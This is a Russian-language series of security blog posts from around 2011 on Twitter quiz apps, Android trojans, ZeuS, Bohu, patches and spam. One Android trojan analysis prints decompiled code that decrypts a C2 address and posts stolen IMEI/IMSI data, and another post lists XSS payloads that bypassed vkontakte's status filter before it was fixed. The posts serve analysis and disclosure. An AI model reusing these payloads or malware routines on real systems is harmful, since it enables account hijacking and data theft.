Читая свою ленту на Твиттере, я заметил нечто весьма интересное. Сообщение (tweet), отправленное с официального корпоративного аккаунта, содержало сокращенную ссылку (bit.ly), которая вела на сайт, распространяющий потенциально опасное приложение.

Если внимательно посмотреть на снимок экрана, обнаружатся две похожие ссылки, сокращенные с помощью сервиса bit.ly. В одной из них пропущена буква d. Отсюда и название – «Ошибка на одну позицию 2.0».

В результате элементарной ошибки копирования новая ссылка ведет совершенно не на тот сайт, на который должна была бы. На всякий случай я решил проверить ссылку на сайте http://web-sniffer.net.

Вот сайт, на который попадаешь по ссылке в сообщении Twitter:

Судя по присутствию слова quiz в названии сайта (LOLquiz), он предлагает разного рода викторины. Однако выглядит он подозрительно. По моему опыту, многие сайты, похожие на этот, используются для вредоносных целей.

Поэтому я решил продолжить расследование и кликнул по ссылке на выбранную случайным образом викторину:

Войдя в тестовый аккаунт Twitter на тестовом компьютере, я кликнул по кнопке подтверждения участия в викторине. На той же странице было написано, что регистрация означает согласие на подписку на ленту сообщений в Twitter, принадлежащую владельцам сайта. Удивительно, но, пройдя по ссылке, я снова оказался в Twitter, и мне было предложено разрешить некому приложению доступ к моей учетной записи, как видно на снимке экрана ниже:

В своей тестовой учетной записи я авторизовал приложение и был перенаправлен на ту самую викторину, в которой собирался принять участие:

Но каковы были функции того приложения?

Разрешив установку этого приложения, я тем самым предоставил ему права на чтение и запись моего аккаунта в Twitter, как видно на снимке экрана ниже:

Как только приложение получило доступ к моему аккаунту, оно автоматически подписалось на ленту учетной записи lolquiz в Twitter. Эта особенность поведения программы описана на сайте одним предложением, набранным очень мелким шрифтом, и при первом просмотре сайта я его не заметил.

Теперь мой тестовый аккаунт «следует» в Twitter за авторами этого потенциально опасного приложения.

Если посмотреть на число подписчиков на сообщения этой учетной записи, окажется, что права доступа к своим аккаунтам дали этому приложению более 300 000(!) пользователей. Я уверен, что большинство из них не читали набранную мелким шрифтом информацию о функции этого приложения по автоматической подписке на ленту сообщений в Twitter, принадлежащую владельцам сайта.

Пока что никаких сообщений не было. Поэтому я решил попробовать ответить на вопросы викторины и посмотреть, произойдет ли что-нибудь после этого:

Как только вы заканчиваете отвечать на вопросы, приложение рассылает подписчикам вашего аккаунта сообщение с вашими результатами. Если кто-то из них захочет попробовать принять участие в викторине, ему тоже придется дать приложению доступ к своей учетной записи в Twitter, и он тоже автоматически станет подписчиком «lolquiz» и разошлет сообщение о своих результатах своим подписчикам и т.д. Это приводит к вирусному распространению приложения.

Интересно, что автор этого приложения сам является подписчиком двух аналогичных лент в Twitter.

Простой поиск на Twitter выдает множество аналогичных сообщений от других пользователей:

Остается непонятной настоящая цель, ради которой создавалось это приложение, которое (на данный момент) является не вредоносным, но потенциально опасным.

Авторы приложения утверждают, что вы всегда можете отписаться от их ленты сообщений, но не упоминают о том факте, что при этом у приложения сохранятся права на чтение и запись в вашей ленте Twitter. Отписаться от их ленты можно, отправив им сообщение напрямую (Direct Message), но это не приводит к удалению приложения или к прекращению автоматической рассылки сообщений.

Подобные приложения-викторины очень распространены в сети Facebook, а теперь они, очевидно, заполонили и Twitter. Эта викторина, судя по всему, появилась в 2009 году.

Если авторы приложения решат разместить на сайте что-то более опасное (или если он будет взломан с размещением вредоносных ссылок), это может привести к куда более серьезной проблеме, которая затронет сотни тысяч пользователей. Ведь авторы приложения могут посылать какие угодно сообщения с вашего аккаунта в Twitter.

Мой пост о фальшивом антивирусе, распространяемом через Twitter, дает прекрасный пример того, что может произойти.

Мне кажется, это со всей очевидностью показывает, насколько опасными могут быть сервисы по сокращению интернет-адресов: банальная ошибка копирования текста может привести к тому, что по ссылке будет открываться совершенно другой веб-сайт, в то время как при использовании обычных ссылок в большинстве случаев подобная ошибка приведет лишь к сообщению «404 – Страница не найдена».

Новый пост в блоге Google обещает пользователям ответ на вопрос, что делать с так называемым «DroidDream» - зловредом, который заявил о себе на Android Market на прошлой неделе:

Зловреды на Android Market, часть 1

Зловреды на Android Market, часть 2

По данным блога, Google начинает процесс удаления зловреда путем удаленной установки на устройство нового приложения, которое называется “Android Market Security Tool March 2011”. Мы посмотрели на это приложение – оно не закрывает уязвимость, оно просто удаляет программы, считающиеся вредоносными. Далее Google обещает внести изменения в организацию работы Android Market для того, чтобы решать такого типа проблемы и утверждает, что «сотрудничает с партнерами для предоставления решения по основным вопросам защиты».”

Эта часть выглядит замечательно за исключением нескольких бросающихся в глаза фактов:

Google вводит пользователей в заблуждение. В тексте говорится, что «обновление автоматически ликвидирует эксплойт». Однако это не делает ваш телефон менее уязвимым. После того, как я несколько раз перечитал пост, я понял имеется в виду, что уязвимые телефоны теперь защищены от эксплойтов, используемых во вредоносных программах DroidDream. Но это не тот случай.

Установка патча – очень любопытный процесс: Google удаленно устанавливает приложение на устройство без согласия пользователя, приложение запускается также без его согласия (иначе это называется удаленное исполнение кода), затем приложение получает root-привилегии, удаляет другие приложения и потом удаляет само себя. Любой из этих шагов может быть вполне приемлемым, если бы пользователь мог участвовать в процессе.

Установить патчи локально невозможно. В случае с Android в его настоящем виде удаленно устанавливать обновления на компьютер, как это делается в системах Linux и Windows, трудно и дорого. В отличие от iPhone, который устанавливает патчи через iTunes или Windows Mobile, использующие ActiveSync, Android работает практически полностью через беспроводные линии связи. Это осложняет жизнь мобильных операторов, которые должны удаленно установить обновленные данные на устройства всех своих клиентов через свою мобильную сеть. Это очень дорого. Если бы Android мог устанавливать более мелкие патчи, и если бы клиенты могли устанавливать их через обычный компьютер (даже опционально), это позволило бы и поставщикам услуг, и производителям, и клиентам чаще устанавливать обновления.

Еще одна проблема заключается в том, что сами производители устройств не обеспечивают постоянной поддержки или обновления своих платформ. Почитайте любой мобильный форум, и вы увидите, что масса пользователей просто умоляет выпустить обновление для их устройств. По статистике Google, более чем у 40% пользователей Android стоит версия ОС ниже Android 2.2. Даже те, кто пользуется версией 2.2, уязвимы, поскольку эксплойт работает на версиях 2.2.1 или даже более ранних. К сожалению, Google не хочет замечать эти цифры, чтобы не портить статистику. За исключением небольшого числа клиентов, которые получают обновления Android Market Security Tool, каждый второй пользователь устройств с ОС версий 2.2.1 и ниже остается уязвимым.

Google обещает внести изменения в организацию работы Android Market, и эти изменения нам еще предстоит увидеть. Но компании не следует забывать и про более масштабные задачи: необходимость своевременного обновления приложений на компьютерах всех своих клиентов и быстрое закрытие уязвимостей с предоставлением пользователям разных вариантов установки обновлений. Для Google и партнеров корпорации это одновременно и возможность, и ответственность. Будем надеяться, что они не упустят первой и не откажутся от второй.

Очередная вторничная порция ежемесячных патчей Microsoft состоит из трех бюллетеней, закрывающих четыре уязвимости. Два бюллетеня касаются Windows, третий имеет отношение к Office. Уязвимости Windows касаются всех клиентских операционных систем, поддерживаемых в настоящий момент. Единственная критическая уязвимость месяца – в Windows Media. Вредоносный MS-DVR-файл позволяет осуществлять удаленное выполнение кода.

Затронутые продукты – Windows Media, Groove and Remote Desktop (удаленный рабочий стол). Исправлены две уязвимости в Windows Media. Все три продукта страдают от хорошо известной к настоящему времени уязвимости "Insecure Library Loading" (загрузка небезопасной библиотеки), которую мы много раз наблюдали за последнее время. Учитывая то, какие программы оказались затронуты и как они работают, маловероятно, что данные уязвимости станут массово эксплуатироваться.

Эта уязвимость имеет отношение к тому, как программы загружают DLL во время выполнения. Вместо того, чтобы загружать библиотеки из заранее заданного местонахождения, продукты вначале пытаются найти библиотеки в папке, где находится файл, который они пытаются прочесть. Поместив вредоносную библиотеку с заранее определенным именем в (удаленную) папку, где лежит файл, ассоциированный с соответствующей программой, киберпреступник может выполнить код.

Чтобы такие атаки были успешными, пользователь должен вручную запустить файл, ассоциированный с этими программами, например файл DVR-MS в случае Windows Media или файл RDP в случае Remote Desktop. Эти уязвимости, связанные с загрузкой небезопасных библиотек, отмечены как важные.

В данной порции патчей не были закрыты некоторые хорошо известные уязвимости; так, не было патча для CVE-2011-0096 и патча для уязвимости в протоколе Windows Browser. Хотя CVE-2011-0096 – это «всего лишь» XSS-уязвимость, ее не стоит недооценивать. Хотя эти уязвимости нечасто используются в массовых атаках, их несомненно используют в таргетированных атаках. Будем надеяться, что Microsoft сможет закрыть эту уязвимость в следующем месяце. Уязвимость в протоколе Windows Browser крайне сложно успешно эксплуатировать, и Microsoft может понадобиться провести серьезную работу, чтобы закрыть ее. Так что неудивительно, что заплата для этой уязвимости не вошла в выпуск патчей этого месяца.

Как всегда, мы рекомендуем установить патчи как можно быстрее.

Теневой бизнесмен Роберт Солоуэй (Robert Soloway), получивший за свою активность в Сети прозвище «король спама», отбыл назначенный срок и покинул место заключения. Он клянется, что покончил с неправедной жизнью, хотя верится в это с трудом: закоренелый спамер никогда не скупился на покаянные речи.

Солоуэй занимался рассылкой заказного спама и продажей спамерского инструментария с 16-ти лет. Свои услуги он рекламировал тоже через спам-рассылки, которые проводил, используя специализированную программу Dark Mailer. В 2003 году организация Spamhaus приобщила имя Солоуэя к списку наиболее агрессивных спамеров, ROKSO.

За время своей «бизнес-карьеры» Солоуэй, по его собственным оценкам, отослал свыше 10 трлн. нелегитимных писем. Его неоднократно привлекали к суду и назначали большие штрафы. Спаммейстер раз за разом проигрывал процесс, охотно каялся и вновь возвращался к своему единственному занятию, не отдав истцу ни цента. Когда терпение судей иссякло, упрямца отправили за решетку, где он провел почти 4 года.

По условиям судебной сделки, в течение трех лет почтовые отправления Солоуэя и его визиты на веб-сайты будет контролировать служба пробации. В своем первом интервью, которое он дал по выходе из заключения, 31-летний спамер признал, что его прежнее поведение в Сети было антиобщественным. Он заявил, что получил хороший урок и хочет делом доказать всем скептикам свою готовность послужить на благо интернет-сообщества. Отныне он посвятит свою жизнь ― только не падайте в обморок! ― пропаганде законопослушного поведения в интернете, явит миру секреты сетевого Зазеркалья и научит участников «всемирной паутины», как обороняться от злых козней спамеров.

Первая неделя весны отмечена возрастанием рекламы семинаров и конференций, предложением разнообразных транспортных перевозок и рекламы развлекательных мероприятий (они попадают в рубрику "Отдых и путешествия"):

• образование (54,8%);
• транспорт (16,1%);
• отдых и путешествия (15,5)%;
• медикаменты (5,4%);
• недвижимость (5,4%).

С точки зрения спамера, видимо, идеальный клиент должен только и делать, что разъезжать на такси между конференц-залами и театрами.

Доля спама в почтовом трафике рунета возросла по сравнению с прошлой неделей: она составила 81,6%.

Вчера мой коллега Тим Армстронг написал о всплеске вредоносной активности на Android Market. Вкратце - несколько легальных приложений были заражены троянцами и загружены в Android Market. Давайте рассмотрим эти приложения поближе.

Как уже ранее упоминалось, все вредоносные приложения, с которыми мы имели дело до настоящего времени, использовали одни и те же эксплойты, классифицирующиеся «Лабораторией Касперского» как Exploit.AndroidOS.Lotoor.g и Exploit.AndroidOS.Lotoor.j. Оба хорошо известны и работают на всех версиях операционной системы Android ниже 2.3. Это значит, что любой пользователь Gingerbread (Android 2.3) должен быть защищен от этих эксплойтов.

Итак, что конкретно крадут эти троянцы? Похоже, злоумышленник очень хотел заполучить номера IMSI и IMEI. Кроме того, они собирают информацию об операционных системах и типах устройств.

Кража происходила так: внутри кода есть блок зашифрованной информации размером ровно 45 байт. Этот блок зашифрован с использованием простого XOR-алгоритма с помощью специального ключа, который хранится в другом блоке под названием “KEYVALUE”. Если вам интересно, то подпрограмма для дешифрования выглядит вот так:

public static void crypt(byte abyte0[ ])
====={
=====int i = 0;
=====int j = 0;
=====do
=========={
==========int k = abyte0.length;
==========if(j >= k)
===============return;
==========byte byte0 = abyte0[j];
==========byte byte1 = KEYVALUE[i];
==========byte byte2 = (byte)(byte0 ^ byte1);
==========abyte0[j] = byte2;
==========i++;
==========int l = keylen;
==========if(i == l)
===============i = 0;
===============j++;
==========}
=====while(true);
=====}

После расшифровки первый блок информации указывает на hxxp://184.105.245.17:8080/GMServer/GMServlet, который «приютил» провайдер по имени Hurricane Electric (http://www.he.net/) в г. Фремнонт, Калифорния. Мы уже связались с Hurricane Electric по поводу этого провайдера и порекомендовали его остановить. На момент написания этого блога вредоносный сервер был уже недоступен.

Как мы уже говорили, троянец скорее всего, был создан для того, чтобы собирать коды IMEI и IMSI, а также специальную информацию об устройствах. Украденные данные передаются на сервер киберпреступников методом POST через НТТР-протокол. Загруженные блоки имеют формат XML и выглядят вот так:

Стандартный формат XML-шаблона

Информация, переданная Backdoor.AndroidOS.Rooter.a

Информация, переданная Backdoor.AndroidOS.Rooter.b

POST-метод, используемый Backdoor.AndroidOS.Rooter

Командное поле, установленное на «0» в приведенном выше блоке, информирует о загрузке похищенных IMEI и IMSI-кодов вместе с информацией об устройстве. Вы можете видеть, что информация в тегах имеющихся у нас двух разных вредоносных АРК-файлов, отличается: ProductId имеет два значения - 10023 и 10039. Очевидно, злоумышленник хотел посчитать долю успешных попыток разных троянцев достигнуть цели. Хотим так же заметить, что информация в теге (‘502’) одинакова в обоих образцах. Этот тег заставляет нас задуматься – может ли этот ‘502’ быть своего рода ID-компаньоном или партнером. Если это так, то возникает вопрос, как много было (или есть) там таких компаньонов.

Чтобы избежать многократной отправки одной и той же информации, троянец после успешной загрузки устанавливает параметр предпочтений ‘pref_config_setting’ на значение "done":

public void run()
====={
if(Setting.access$1(Setting.this).getSharedPreferences("pref_config_setting",0).getInt("done",0)== 0)
=========={
==========byte abyte0[] = val$c;
==========String s = new String(abyte0);
==========Context context = Setting.access$1(Setting.this);
==========Setting.postUrl(s, context);
==========}

Помимо рассылки похищенных IMEI и IMSI-кодов троянец устанавливает еще один модуль. Он делает это, копируя файл внутреннего ресурса sqlite.db в DownloadProvidersManager.apk:

private void destroy(boolean flag)
{
=====boolean flag1;
=====if(flag && !isPackageInstalled(ctx, "com.android.providers.downloadsmanager"))
==========flag1 = cpFile(ctx, "sqlite.db", "DownloadProvidersManager.apk");
=====stopSelf();
}

Итак, каково же назначение этого второго модуля? Он подсоединяется обратно к тому же серверу, где он загружал похищенные IMEI и IMSI-коды, но с другим блоком запроса (Команда «2»). В это раз он считывает ответ с сервера, который, судя по всему, включает список приложений для загрузки и установки на уже зараженное устройство.

Модульная архитектура троянца интересна и позволяет сделать несколько важных выводов. Прежде всего, он был создан таким образом, чтобы его было легко включать в популярные приложения для загрузки на Market с дезориентирующими именами. Во-вторых, он имеет классическую административно-управленческую архитектуру: он рассылает начальный запрос «Я здесь» (I’m here) c базовой информацией, а затем разворачивает более сложный загрузчик для дальнейшего заражения устройства. Это характерно для многих Windows-троянцев. И наконец, возможность инсталлировать другие приложения на устройства указывает на способ, которым вирусописатель планировал заработать на заражениях – размещая рекламное ПО или приложения рекламного характера.

Мы будем продолжать следить за ситуацией и сообщать обо всех изменениях.

Английские тинейджеры, управлявшие криминальным веб-сайтом GhostMarket.net, приговорены к тюремному заключению на разные сроки.

Англоязычный форум GhostMarket насчитывал около 8 тыс. зарегистрированных участников и был известен как площадка для купли-продажи ворованной информации, зловредных программ и образовательных материалов для хакеров. Потенциальный ущерб от деятельности одиозного веб-сайта, по некоторым оценкам, превышает 12 млн. фунтов стерлингов (около 19 млн. долларов).

В Великобритании создание такого предприятия и коллективное руководство его жизнедеятельностью расцениваются как серьезное преступление. Однако суд принял во внимание молодой возраст правонарушителей и назначил не слишком суровые сроки. 19-летний Николас Уэббер (Nicholas Webber), основатель и администратор GhostMarket.net, приговорен к 5 годам тюремного заключения. Его «правая рука» Райан Томас (Ryan Thomas), 18-летний модератор хакерского форума, получил 4 года. Вирусописателю Гэри Келли (Gary Kelly), которому минул 21 год, вменили также в вину создание ботнета на основе ZeuS с целью хищения банковских реквизитов и лишили свободы на 5 лет. Одна из девушек, помогавших хакерам отмывать «грязные» деньги, проведет под стражей 1,5 года, другой назначили 200 часов общественных работ.

Недавно я решил подготовить очередную презентацию, посвященную web-уязвимостям, в частности, XSS-атакам. Для этого мне нужно было изучить некоторые особенности современных систем фильтрации.

В качестве целевого сайта для тестирования я выбрал самый посещаемый сайт Рунета – vkontakte.ru. Мое внимание привлекла обновленная система статусов.

Код HTML-странички в месте, где происходит редактирование статуса, выглядит следующим образом:

Как видно, фильтр расположен непосредственно в функции infoCheck(). Сам же статус располагается в этой строке:

В данном случае имеем двухступенчатую фильтрацию. Первая ступень – непосредственно фильтрация у пользователя при вводе статуса. Вторая – преобразование введенного статуса в текст и возвращение его на страницу в том виде, в котором статус увидят другие пользователи.

В то время как вторая ступень работает безусловно хорошо, и превратить введенное пользователем в активную XSS явно не удалось бы, с первой не все так гладко. Именно о первой ступени и пойдет речь.

Как и предполагалось, простой <script>alert()</script> не сработал, статус остался пустым. Вариации на «околоscript-ные» темы тоже не прошли – судя по всему, конкретно эта последовательность фильтруется явным образом.

Однако, для выполнения скрипта вовсе не обязательно наличие тега <script>. Первая уязвимость на пользовательской машине достигается использованием тега <img>: введя в статус строку <img src=1.gif onerror=some_function>, мы добьемся выполнения этой самой функции. Для наглядности можно вызвать функцию profile.infoSave(), вызываемую с пустым аргументом при очистке статуса, с нашим аргументом. Так, введя <img src=1.gif onerror=profile.infoSave('XSS')>, получаем в статусе строчку “XSS”:

Вторая забавная уязвимость фильтра – в отсутствии фильтрования тега <A>. Вводим в статус <A HREF="//www.google.com/">XSS</A> и получаем… гиперссылку, по клику на которой открывается окно для редактирования статуса, а мгновением позже – сайт google.com!

Как мы помним, XSS = cross site scripting, поэтому в следующей уязвимости я решил использовать сторонний сайт с загруженным туда скриптом. Помимо отсутствия фильтрации вышеуказанных тегов, проходит фильтр и тег <iframe>. Таким образом, введя в статусную строку <iframe src="yoursite.com" width="100%" height="300">, получаем iframe с запуском того самого загруженного скрипта. Пример такого “айфрейма”:

Эта уязвимость является более серьезной, чем две предыдущие. Один из способов эксплуатации – составление URL для изменения статуса пользователя и последующий клик пользователя по этому URL жертвой. Еще до того, как статус будет опубликован, скрипт успеет выполниться на странице пользователя. Таким образом, получаем классическую пассивную XSS.

Уязвимости были актуальны с 01.08.2010 - с момента введения новой системы статусов. 01.03.2011 мы сообщили администрации сети ВКонтакте об обнаруженных уязвимостях, и 03.03.2011 уязвимости были закрыты.

Каждый день появляются новые сообщения о вредоносных программах для Android. Однако на этот раз три разработчика – MYOURNET, Kingmall2010 и we20090202 (не исключено, что это один и тот же человек) – предлагали для бесплатной загрузки несколько приложений для устройств на базе Android не где-нибудь, а на Android Market.

Многие, если не все, предлагаемые ими приложения оказались копиями легитимных программ, созданных другими разработчиками, с добавленным троянским функционалом.

Я, в частности, загрузил приложение под названием Super Guitar Solo. Анализ показал, что оно содержит популярный root-эксплойт «rage against the cage», позволяющий троянцу получить на телефонах Android права root-доступа и вместе с ними – привилегии суперпользователя. Как скажет вам любой Linux-гуру, права суперпользователя обеспечивают полный – на уровне администратора – доступ к операционной системе телефона. В данном случае запуск эксплойта происходит без согласия пользователя.

Какова же цель этого троянца? Программа пытается собрать, среди прочего, следующие данные: product ID, user ID, тип устройства, язык, страну и др. – и загрузить собранные данные на удаленный сервер. В отличие от большинства других известных нам образцов, этот зловред не делает попыток отправлять платные SMS-сообщения на премиум-номера.

Мы придаем этому инциденту такое значение потому, что до сих пор практически все вредоносные программы для Android появлялись за пределами Android Market. Соответственно, для заражения телефонов требовались дополнительные усилия. Однако новая версия Android Market позволяет устанавливать приложения на устройство удаленно – через веб-интерфейс. Об этом мы уже писали в блоге «Темная сторона нового Android Market».

Кроме того, как и предсказывали в прошлом году наши эксперты, киберпреступники взяли на вооружение утилиты для джейлбрейкинга (разблокировки операционной системы мобильного телефона). Об опасностях джейлбрейкинга вы можете узнать из нашего вебкаста The Dangers of Jailbreaking.

По всей вероятности, описанные выше вредоносные программы – далеко не все, что доступны в данный момент на Android Market. Специалисты «Лаборатории Касперского» рекомендуют внимательно следить за тем, какие права доступа запрашивает каждое приложение при установке. Кроме того, эта ситуация в очередной раз показывает, какие опасности таит в себе джейлбрейкинг и повышение привилегий пользователя устройства до уровня администратора (rooting). Начиная с 1 февраля продукты «Лаборатории Касперского» детектируют root-эксплойт, о котором здесь идет речь, как Exploit.AndroidOS.Lotoor.g или Exploit.AndroidOS.Lotoor.j. Так что если вы – пользователь продукта Kaspersky Mobile Security, то ваше устройство от этого зловреда защищено.

Эксперты «Лаборатории Касперского» продолжают изучение данного образца.

ОБНОВЛЕНИЕ: Google удалил из Android Market описанные нами вредоносные приложения и страницу, с которой их можно было загрузить.

13 января мой коллега Вячеслав Закоржевский опубликовал блогпост об опасностях, связанных с использованием взломанных программ и генераторов ключей, в котором рассказал о зловредах, предназначенных для кражи регистрационных ключей к популярным программным продуктам и паролей к онлайн-играм.

Несколько дней назад мы обнаружили новую вредоносную программу, названную ее авторами Kaspersky Trial Resetter и выдающую себя за утилиту для продления пробного периода антивирусных продуктов «Лаборатории Касперского».

Зловред детектируется нами как Trojan-PSW.MSIL.Agent.wx. В настоящий момент только два производителя антивирусного ПО, включая «Лабораторию Касперского», детектируют эту программу. В данном случае фокус в том, что вместо обещанного продления пробного периода троянец крадет информацию, хранящуюся на вашем компьютере – пароли, сохраненные браузером и другими приложениями.

Если верить заголовку PE-файла, эта вредоносная программа была создана 31 января 2011 года. При этом первые сообщения о заражении появились 6 февраля.

Насколько успешным может быть такой зловред? Судите сами:

Количество заражений в день

За 23 дня троянцем, крадущим пароли, в общей сложности были заражены 1109 компьютеров, что составляет в среднем 48 заражений в день.

В пятерку стран-лидеров по количеству заражений вошли:

А что можно сказать о типе украденных аккаунтов?

Среди украденных этой вредоносной программой данных – сотни паролей к аккаунтам на сайтах хостинг-провайдеров, интернет-магазинов, интернет- и мобильных провайдеров, социальных сетей (LinkedIn, Twitter, Facebook, MySpace etc.), а также к системам электронной почты, блогам, банковским сервисам, сервисам мгновенного обмена сообщениями, онлайн-играм и т.д.

Ниже представлены данные о браузерах, ставших мишенью этой вредоносной программы, и о количестве пострадавших пользователей:

Специалисты «Лаборатории Касперского» связались с хостинг-провайдером, на чьих серверах была размещена вредоносная программа, который закрыл и удалил аккаунты злоумышленников. Надеюсь, что приведенная статистика убедительно свидетельствует против загрузки пиратских программ: компьютеры 1109 пользователей, которые хотели взломать защитное решение, в результате были заражены вредоносным ПО.

Кроме того, очевидно, что сохранение паролей в браузере – тоже не лучшая идея. Разумнее воспользоваться программой для управления паролями, такой как Kaspersky Password Manager, которая хранит все ваши пароли в зашифрованном виде и обеспечивает их защиту от подобных атак.

В настоящее время мы пытаемся проинформировать пострадавших пользователей о заражении их компьютеров.

Совсем недавно мы обнаружили новый троянец-вымогатель Trojan-Ransom.Win32.Vkont.a. Распространяется он с сайта, на котором предлагается скачать «Программу для взлома контакта по ID». Оформление страницы, на которой предлагается скачать программу, якобы позволяющую читать чужие сообщения, напоминает главную страницу сайта «ВКонтакте».

Фрагмент сайта, с которого распространяется вымогатель

Некоторое время назад стало известно о том, что разработка ZeuS перешла к создателю другой троянской программы-конкурента SpyEye. Теперь все ждут, когда же в результате слияния двух этих программ-шпионов появится новый «монстр». Скорее всего, разработчик SpyEye выжмет из ZeuS самое ценное и реализует в SpyEye. Некоторые исследователи уже нашли куски кода, изначально принадлежащего ZeuS, в самплах SpyEye.

 
Часть кода SpyEye, идентичная коду ZeuS

Мы не ждали, что после передачи разработки ZeuS будут появляться новые модификации этого троянца. Конечно, мы все еще получаем стабильный поток самплов ZeuS, но практически все они давно известные версии вредоносной программы. Новые варианты чаще всего получаются просто путем пересборки с помощью конструкторов ZeuS, так называемых ZeuS-builder-ов, одним нажатием кнопки в таких программах. Но время от времени я натыкаюсь на необычные образцы троянца, и сейчас у меня имеются серьезные основания полагать, что ZeuS в той или иной степени все еще поддерживается и развивается.

Все началось с того, что пару месяцев назад мы обнаружили ZeuS, который имел новый функционал: он проверял, не выполняют ли его на тестовой платформе, например, внутри сэндбокса исследовательской компании. Троянец прекращал свое выполнение, если по некоторым признакам определял, что запущен в определенном окружении для анализа.

Ниже приведен пример одной из проверок — ZeuS проверяет, не запущен ли он на виртуальной машине VMware путем открытия специфических для этой виртуальной машины устройств:

1-я проверка, не запущен ли ZeuS на виртуальной машине VMware

2-я проверка, не запущен ли ZeuS на виртуальной машине VMware

Несколько недель назад появился другой ZeuS со странной для этого семейства активностью. Все последние варианты ZeuS имели один и тот же алгоритм расшифровки секции внутри своего кода, которая содержала начальные внутренние настройки троянца (ссылка, по которой должен загружаться файл конфигурации, ключ шифрования трафика и т.п.). Так вот, в новом необычном сампле обнаружилось двойное шифрование. Сначала данные расшифровываются по стандартному алгоритму, но адрес к файлу конфигурации при этом получается фальшивый. И только вторая расшифровка дает реальную ссылку на файл конфигурации, в котором, собственно, указывается адрес центра управления ботнетом.

Ниже показано, как это выглядит в действительности. После первой расшифровки в секции видны начальные настройки (подсвечены зеленым), но ссылка внизу фальшивая. Настоящая ссылка скрыта в области, выделенной красным, она проявится только после второй расшифровки.

Расшифровка секции начальных данных

А несколько дней назад я нашел ZeuS, который тоже проверяет, не запущен ли он для анализа, например, в антивирусной компании. Функционал тот же, но уже с небольшими изменениями: добавился еще один критерий для обнаружения новой тестовой площадки.

Этот вариант ZeuS к тому же имеет измененные по структуре части кода, которые оставались неизменными более полугода — а это тысячи и тысячи модификаций троянца.

Изменение одной из раннее неизменных частей кода ZeuS

Изменение части кода указывает на то, что сампл был создан с помощью новой перекомпилированной версии ZeuS-конструктора.

Отмечу, что такой функционал определения тестовых платформ уникален. Я бы сказал, скорее всего, он был добавлен к основному функционалу ZeuS по заказу как специальная функция, опция, если хотите. Таким образом, очень похоже на то, что эта модификация ZeuS является свидетельством продолжения технической поддержки последних важных клиентов, пользующихся троянцем.

В итоге, что же это такое? Предсмертные агонии умирающего «бога», или наоборот – перевоплощение в новую ипостась? Может быть, ZeuS станет менее распространенным, не для масс, но более эксклюзивным, так сказать, для избранных? Что ж, время покажет…

В начале этого года достаточно активно распространялась троянская программа под названием Bohu, которая привлекла к себе внимание тем, что способна блокировать «облачные» антивирусные сервисы, что пока еще встречается нечасто. Программа распространяется с помощью приемов социальной инженерии и ориентирована прежде всего на китайских пользователей. Коллеги из MMPC (Microsoft Malware Protection Center – антивирусного центра Microsoft) опубликовали интересный блогпост в котором подробно рассказали об этом троянце.

Нужно отметить, что наши продукты детектировали и блокировали Bohu на основе анализа его поведения в системе еще до того, как в базы были добавлены сигнатуры троянца. Тем не менее, если ваша система была заражена до того, как вы установили антивирусный сканер, у вас могут возникнуть серьезные проблемы…

Среди прочего, Bohu блокирует доступ к серверу «Лаборатории Касперского», с которого загружаются обновления сигнатурных баз, перехватывая запросы на преобразование доменных имен и блокируя попытки соединения с доменом, в котором находится сервер обновлений. Из-за этого на зараженном компьютере не происходят автоматические обновления сигнатурных баз «Лаборатории Касперского», в результате чего антивирусный продукт не имеет возможности обнаружить и нейтрализовать угрозу.

Однако тем, что Bohu фильтрует доменные имена, можно воспользоваться для проверки системы на наличие заражения! Мы разместили небольшую веб-страничку по адресу http://www.securelist.com/bohucheck которая выдает два разных сообщения в зависимости от того, имеет ли проверяемый компьютер доступ к блокируемому троянцем домену. Теперь пользователю достаточно посетить эту страничку, чтобы выяснить, заражен ли его компьютер троянцем Bohu. Если страница выдает показанное выше сообщение – значит, троянца на компьютере нет.

Но если на странице появляется следующее предупреждение – система, скорее всего, заражена:

В любом случае, если вы увидели такое сообщение, вам следует самостоятельно проверить и вылечить свой компьютер. Для этого вы можете бесплатно загрузить образ диска аварийного восстановления и создать загрузочный компакт-диск или USB-накопитель, а затем загрузиться с него. Фильтр доменных имен, установленный троянцем, никак не затрагивает систему, загружаемую с диска аварийного восстановления. Поэтому антивирус, входящий в состав диска, сможет обновить базы сигнатур, чтобы обнаружить и удалить вредоносную программу. Дополнительную информацию об использовании диска аварийного восстановления можно найти здесь.

В последнюю неделю зимы наибольшая часть спама пришлась на следующие тематики:

• образование (45%);
• реклама спамерских услуг (8,1%);
• компьютеры и интернет (8,1%);
• медикаменты; товары/услуги для здоровья (7,7%);
• другие товары и услуги (7,2%).

Доля спама в почтовом потоке российского сектора интернета не изменилась с прошлой недели и составила те же 78,7%.

Слово «утечка» стало очень популярно в последнее время, но мало кто задумывался, насколько утечка нашей личной информации вероятнее, чем мы это предполагаем. Мы защищаем наши компьютеры, мобильные устройства, учимся безопасности в целом, и тем не менее есть ситуации, на которые мы просто, что называется, не обращаем внимания. Речь идет о компьютерах для публичного пользования, как, например, вот такой:

Это реально существующий компьютер, который установлен для бесплатного пользования в одном отеле, где я останавливался на прошлой неделе, будучи в коротком отпуске. Мне срочно нужно было воспользоваться интернетом, и, конечно, я понимал, что, пользоваться им небезопасно - мои личные данные могут попасть в чужие руки. Я решил провести небольшое исследование, результаты которого недвусмысленно говорят о том, что каждый из нас легко может стать жертвой индивидуальной «(wiki)leaks»:

1. Компьютер был заражен сразу несколькими вредоносными программами, которые не детектил достаточно хороший авторитетный антивирус, обновленный на момент обнаружения вирусов. Это был один бэкдор, который воровал пароли от четырех бразильских банков и одного испанского. Исследование показало, что компьютер был им заражен через социальную сеть Оркут еще 11 июля 2010 года. С того самого времени зловред собирал пароли от банковских счетов, и кто знает, сколько людей стали его жертвами! Помимо него там были даунлодеры на основе технологий Java и другие вирусы.
2. В настройках браузера стояла опция, которая сохраняет пароли, при этом, конечно, не оповещая пользователя об этом. Все собранные пароли хранились под одним общим паролем мастера, который, очевидно, знал тот человек, который включил эту опцию.
3. В папках «Мои документы», а также «Загрузки» было много, очень много файлов и фотографий, которые пользователи качают из интернета или своей почты и забывают удалять. Вот только некоторые примеры данных, которые я обнаружил:
   • Документ о возбуждении уголовного дела и повестка в суд.
   • Отчет о проделанной работе по настройке серии компьютеров в одном учреждении.
   • Расписание бизнес-мероприятий одной компании.
   • Личные фотографии людей с их близкими.
   • Акт о передаче недвижимости.
   • График выполнения работ.

Я думаю, что мало кто хотел бы, чтобы его документы, особенно такого характера, попали в руки чужих людей, конкурентов или киберпреступников.

